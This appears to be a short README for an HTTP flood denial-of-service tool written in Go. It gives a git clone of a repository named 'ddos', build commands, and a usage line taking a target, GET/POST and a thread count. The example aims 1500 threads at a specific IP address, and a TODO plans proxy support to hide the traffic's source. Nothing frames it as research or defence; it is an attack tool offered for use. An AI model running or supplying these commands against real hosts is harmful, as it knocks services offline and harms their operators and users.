Just simple httpflood
TODO: Remove shity-code Add proxy
git clone https://github.com/QuangTruong05/ddos.git
cd HTTP-Flood
go mod init http
go get github.com/valyala/fasthttp
go build
./http <target> <GET/POST> <threads>
example: ./http http://51.159.30.249 POST 1500